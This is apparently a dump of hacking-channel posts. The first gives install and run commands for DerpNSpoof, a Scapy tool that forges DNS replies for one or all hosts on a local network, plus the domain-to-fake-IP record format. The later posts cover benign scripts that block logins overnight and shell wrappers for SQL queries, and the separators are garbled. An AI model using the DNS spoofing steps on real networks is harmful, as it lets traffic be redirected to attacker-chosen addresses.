T.me/UndercOdeTesting
INSTALLATION & RUN:
1) git clone https://github.com/Trackbool/DerpNSpoof
2) You need the Scapy Python module. You can install the requirements with 'pip3 install -r requirements.txt' (recommended) or manually with 'pip3 install scapy'
3) Scapy uses tcpdump
4) To execute the tool, you will need root permissions
Help menu:
Commands:
<ip> - Spoof the DNS query packets of a certain IP address
<all> - Spoof the DNS query packets of all hosts
[!] Examples:
# python3 DerpNSpoof.py 192.168.1.20 myfile.txt
# python3 DerpNSpoof.py all myfile.txt
The file format for the records is very simple: store the domain name and, separated by a space, the fake IP on the same line.
Domain to spoof    IP address
example.com        1.1.1.1
example2.com       3.3.3.3
example3.com       3.3.3.3
Note:
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
MANY BEGINNERS NEED TO LEARN HOW TO USE SMALL PYTHON SCRIPTS - OTHERS PREFER WRITTEN TUTORIALS, WHAT DO YOU PREFER?
Anonymous Poll
73% Written general tutorials ?
42% New release small bash/python scripts ?
Mm, so guys want written tutorials. Well, let's send some PHP shell by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
shell - log in for a limited time:
instagram.com/UnderCodeTestingCompany
LET'S START:
Time-limited login can be achieved by combining the at command with the system's maintenance (nologin) feature, using the following three scripts:
1) When this script is executed at the specified time, a file named nologin is created under /etc. When the login program runs, it automatically checks whether this file exists; if it does, users are not allowed to log in. The content is:
vi /sbin/login.denied
echo "Login Denied" > /etc/nologin
chmod 700 /sbin/login.denied
2) This script is executed at the specified time and deletes the nologin file under /etc to allow users to log in again. The content is:
vi /sbin/login.allowed
if [ -f /etc/nologin ]; then
rm /etc/nologin
fi
chmod 700 /sbin/login.allowed
3) Write a script that schedules the two time limits. It reads:
vi /sbin/login.rollback
# queue the lock for 22:00 and the unlock for 8:00
if [ -f /sbin/login.denied ]; then
at -f /sbin/login.denied 22:00
fi
if [ -f /sbin/login.allowed ]; then
at -f /sbin/login.allowed 8:00
fi
chmod 744 /sbin/login.rollback
4) Once it is created, put the /sbin/login.rollback script into crontab so that it is executed in the early morning every day:
crontab -e
# roll login script
00 1 * * * /sbin/login.rollback
5) The effect of this setup is: from 10:00 PM to 8:00 AM the next day, a non-root user who tries to log in is shown the system maintenance status.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
shell - Can you use the shell to query, modify, delete, etc. in SQL?
pinterest.com/UnderCodeOfficial
LET'S START:
#!/usr/bin/ksh
# run the statement held in $SQLCOMM through sqlplus
SQL_EXEC()
{
sqlplus $USER/$PASSWD@$DB <<!
SET LINESIZE 1024
SET PAGESIZE 1024
$SQLCOMM
quit
!
}
#select
SQLCOMM="SELECT 'XXX', username from all_users;"
SQL_EXEC | grep XXX
#insert, delete omitted
With Informix, what should you do if it reports that sql_exec cannot be found?
I think this should work:
# vi query.sh
sqlplus $USER/$PASSWD << EOF
select ...... from ......
insert ......
delete ......
EOF
:wq
# query.sh
isql <<!
database dbname;
select * from tbname where fieldname="xxxxx";
delete from tbname;
.....
close database;
!
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β